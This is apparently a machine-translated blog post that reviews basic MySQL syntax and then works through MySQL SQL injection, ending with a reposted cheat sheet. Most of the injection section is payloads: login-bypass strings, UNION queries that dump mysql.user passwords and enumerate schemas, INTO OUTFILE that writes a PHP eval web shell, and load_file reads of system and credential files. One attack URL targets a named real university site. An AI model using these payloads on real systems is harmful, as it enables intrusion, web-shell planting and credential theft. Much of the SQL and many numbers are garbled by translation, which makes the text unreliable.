MySQL basic syntax and SQL injection extended to the web

Originally wanted to write down the javaweb MVC (tomcat, spring, MySQL) build, yesterday to 3 o'clock in the morning, who knows JdbcTemplate jar package does not make, want to die of heart have, Think about it or take a break, so review the basic MySQL syntax, because the security of the Web was familiar with, saw a lot of hacker defense and hacker X files, a few internet cafes, you know, O (^▽^) o, so expand the web security, common Web injection way, As well as the two documents found;

First review the basic additions and deletions to check:

//Remove the user as Admin field from the Users table;Delete fromUserswhereUser="Admin"//change the password of the user root field in the Users table to 11111Update UsersSetpassword=111111 whereUser=' Root '//Create a new teacher table that contains a self-increment ID, name, address, and admission time (...) .CREATE TABLE teacher (IDint(3) Auto_increment notNULLPrimary Key,nameChar(Ten) notNULL, address varchar ( -)default' Shenzhen',Year date)//add a record for table teacher;Insert INTO teacher values ("','Allen','Dalian Yi Zhong','1976-10-10');//query all the records in the Tacher table; Select is the most common, and you can add various conditions to match the appropriate records later ./*includes and between * * to *; where **order by **group by * * Havingleft join on **;union **limit and other syntax;*/Select* fromTeacher

　　

Database injection of a very old technology, the database is a business or a Web site soul, if your database has been maliciously changed, then we do not have Mimi (>^ω^<), online also often heard that XXX website was black, exploded a variety of passwords , exploded a variety of open room information There are, ah, * degrees have been black , but also heard that most of the Penguin Empire is engaged in anti-black, to engage in security;

　　Just wrote a servlet demo:

　　The normal code is as follows, we get the parameters, then the database query through JDBC ;

If we pass a parameter like this:http://localhost:8080/test4/ann.do?arg=1 ' UNION SELECT COUNT (*) from testorders or ' 1 ' = ' 1;

The merged SQL statement becomes this, which creates an injection vulnerability

The databases I know include MySQL, MSSQL, Oracle, and tepid MongoDB ...., the operation will be only adding and removing changes , I will say MySQL, MySQL with more people ah;

Version (), database (), user () These are equivalent to global variables, in the database directly select version () will return the corresponding database version information;

To determine whether a website exists injection can be manually judged, the common way is to construct:

1=1and1=2Admin' --Admin' #Admin'/*'or 1=1--'or 1=1#'or 1=1/*') or'1'='1--') or ('1'='1--

If the server does not have anti-injection filtering, the SQL statement becomes this: select * from Orders where 1=1 and 1=2 and 1=1;

It is also possible to allow the return of the corresponding database information;

1=2Select/* and 1=2 UNION ALL Select Database ()/* and 1=2 UNION ALL Select User () /*

This can determine whether the version of the database starts with the number 5
SELECT * from db where 1 = 1 and mid (version (), =5)

The union query can obtain the version information of the database, of course, the Union query requires the field must match;
SELECT * FROM Orders Union select 1,version () from Orders

Determines the number of fields in the query, and if successful, the union succeeds;
SELECT * FROM Orders Union select , from Orders

<50 determines the version number of the database by adding and Ord (Mid (Version ())
SELECT * from db where 1 = 1 and Ord (Mid (Version (),)) <50

This can be queried for current user information (such as root)
SELECT * FROM Orders Union Select Database (), user () from Orders

Number of users returned
SELECT * FROM Orders where 1=1 and 1=2 Union select 1,count (*) from Mysql.user

Gets the password that the user name is root;
SELECT * FROM Orders where 1=1 and 1=2 Union select 1,password from Mysql.user where user= ' root '

Gets all database information in INFORMATION_SCHEMA based on the current number of fields
SELECT * FROM Orders where 1=1 and 1=2 Union select 1,schema_name from INFORMATION_SCHEMA. Schemata

Information_schema. Tables This field holds the MySQL table information.
SELECT * FROM Orders where 1=1 and 1=2 Union select 1,table_name from INFORMATION_SCHEMA. TABLES Limit 1,100

Get the table structure of the World database, of course, you first explode the database name;
SELECT * FROM Orders where 1=1 and 1=2 Union select 1,table_name from INFORMATION_SCHEMA. TABLES where table_schema= ' world ' limit 1,100

Get the field, you know the name of the database and the table, you can get the name of the field
SELECT * FROM orders where 1=1 and 1=2 Union select 1,column_name from INFORMATION_SCHEMA. COLUMNS WHERE table_name = ' CI//the hell, yo root This is the rhythm of the direct burst password ah;

SELECT * FROM Orders where 1=1 and 1=2 Union select User,password from Mysql.use

If we are bored, we can use the INSERT into orders (name) VALUES (' hehe '); Add the fields you want;

SELECT * FROM Orders where 1=1, insert into orders (name) VALUES (' hehe ');

We can save the data from the query, of course, you need to know the saved directory .... is to pass the JSP, ASP, PHP pony, pony horse, Big Horse Trojan, and then hehe (￣▽￣) "
Select User from Mysql.user where 1=1 to outfile ' e:/sql.txt ';

O (^▽^) O, the following is reproduced, to prevent forgetting, reproduced from

Burst field length
ORDER BY num/*

Match field
and 1=1 Union Select 1,2,3,4,5.......n/*

Storm field position
and 1=2 Union Select 1,2,3,4,5.....n/*

Using built-in functions to storm database information
Version () database () User ()

　　No need to guess the available fields. Database Information (some sites do not apply):

and 1=2 UNION ALL Select Version ()/*
and 1=2 UNION ALL Select Database ()/*
and 1=2 union ALL Select User ()/*

Operating System Information:
and 1=2 UNION ALL SELECT @ @global. version_compile_os from Mysql.user/*

Database permissions:
and Ord (User (), 1, 1)) =114/* Return to normal description as root

Bauku (mysql>5.0)

MySQL 5 above has built-in library information_schema, which stores all MySQL database and table structure information
and 1=2 Union select 1,2,3,schema_name,5,6,7,8,9,10 from INFORMATION_SCHEMA. Schemata Limit 0,1

Guess table
and 1=2 Union select 1,2,3,table_name,5,6,7,8,9,10 from INFORMATION_SCHEMA. TABLES where table_schema= database (hex) limit 0 (start record, 0 is the first start record), 1 (show 1 Records)-

Guess Field
and 1=2 Union select 1,2,3,column_name,5,6,7,8,9,10 from INFORMATION_SCHEMA. COLUMNS where table_name= table name (hex) Limit 0,1

Burst password
And 1=2 Union Select, user name segment, 5,6,7, password segment, 8,9 from table name limit 0,1

Advanced Usage (one available field displays two data content):
Union Select 1,2,3concat (user name segment, 0x3c, password segment), 5,6,7,8,9 from table name limit 0,1

Direct Write horse (Root permission)
Condition: 1, know the site physical path
2, have sufficient permission (can use Select .... from Mysql.user test)
3, MAGIC_QUOTES_GPC () =off
Select ' <?php eval ($_post[cmd])?> ' into outfile ' physical path '
and 1=2 union ALL Select a sentence hex value into outfile ' path '

The use of Load_file can read the file information, permissions if root;
Select Load_file (' E:/sql.txt '); say I this fetch is not a string file Ah, is blob, who knows how to do it ....

Load_file () Common paths:

1, replace (Load_file (0x2f6574632f706173737764),0X3C,0X -)2, replace (Load_file (Char( -,101, the, About, -, the, the, the, the,119, -)),Char( -),Char( +) the above two are looking at a PHP file that fully displays the code. Sometimes you don't replace some characters, such as "<"Replace with" space "returns a Web page. You can't see the code.3, Load_file (Char( -) ) to list the Freebsd,sunos system root directory4,/etc tpd/conf tpd.conf or/usr/local/apche/conf tpd.conf View Linux Apache Virtual Host configuration file5, C:\Program files\apache group\apache\conf \httpd.conf or C:\apache\conf \httpd.conf view the Windows system Apache file6, c:/resin-3.0. -/conf/resin.conf View JSP-developed Web site resin file configuration information.7, c:/resin/conf/resin.conf/usr/local/resin/conf/resin.conf Viewing a JSP virtual host for Linux system configuration8, d:\APACHE\Apache2\conf\httpd.conf9, C:\Program Files\mysql\my.iniTen、.. /themes/darkblue_orange/layout.inc.php phpmyadmin Blast Path One, C:\windows\system32\inetsrv\MetaBase.xml View the virtual host configuration file for IIS A,/usr/local/resin-3.0. A/conf/resin.conf for 3.0. 22 Resin configuration File View -,/usr/local/resin-pro-3.0. A/conf/resin.conf Ibid . -,/usr/local/app/apache2/conf/extra tpd-vhosts.conf apashe Virtual host view the,/etc/sysconfig/iptables to look at the firewall policy -, USR/LOCAL/APP/PHP5 b/php.ini PHP's equivalent settings -,/etc/my.cnf mysql configuration file -,/etc/redhat-system version of the release Red Hat +, C:\mysql\data\mysql\user. MYD A user password exists in the MySQL system -,/etc/sysconfig/network-scripts/ifcfg-eth0 view IP. +,/USR/LOCAL/APP/PHP5 B/php.ini//PHP Related Settings A,/usr/local/app/apache2/conf/extra tpd-vhosts.conf//Virtual Site Settings at, C:\Program files\rhinosoft.com\serv-U\servudaemon.ini -, C:\windows\my.ini -, C:\Boot.ini

　　

Website Common configuration file config.inc.php, config.php. Load_file () with replace (Load_file (HEX), char (32))
Note:
Char (60) indicates <
Char (32) indicates a space

Problems with manual injections:
When the post-injection page appears:
Illegal mix of collations (latin1_swedish_ci,implicit) and (utf8_general_ci,implicit) for operation ' UNION '
such as: Http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,load_file ( 0x433a5c626f6f742e696e69), 3,4,user ()%20
This is caused by inconsistencies in the coding,
Workaround: Add Unhex (Hex (parameter)) to the parameter before you can do it. The above URL can be changed to:
Http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,unhex (Hex ( Load_file (0x433a5c626f6f742e696e69)), 3,4,unhex (Hex (User ()))%20

use of the GROPU by statement

Using the group by exploded database field, I this 5.x version is invalid, should be 4 or 3 version has this loophole ....

SQL Injection Cheat Sheet

Injection

injected Instance

JB51 MySQL basic information open

MySQL basic syntax and SQL injection extended to the web